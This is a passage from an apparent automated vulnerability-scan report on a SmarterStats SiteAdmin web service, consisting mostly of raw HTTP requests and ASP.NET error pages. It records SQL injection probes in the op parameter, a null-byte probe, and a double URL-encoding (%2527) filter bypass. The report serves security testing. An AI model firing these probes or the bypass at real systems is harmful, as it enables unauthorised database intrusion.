<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=AddSite3%00'' HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:33:16 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 2797
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>












<span>
Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.
<h2>Method Not Found</h2>
Method 'AddSite3.&#39;&#39;' was not found in service SiteAdmin.
</span>


</body>
</html>

2.19. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [op parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The op parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the op parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /Services/SiteAdmin.asmx?op=GetSiteStatus'%20and%201%3d1--%20 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:27 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=GetSiteStatus'%20and%201%3d2--%20 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:28 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 2807
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>












<span>
Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.
<h2>Method Not Found</h2>
Method 'GetSiteStatus&#39; and 1=2-- ' was not found in service SiteAdmin.
</span>


</body>
</html>

2.20. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [op parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The op parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the op parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the op request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Services/SiteAdmin.asmx?op=AddSite2%2527 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:01 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=AddSite2%2527%2527 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:02 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 2792
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
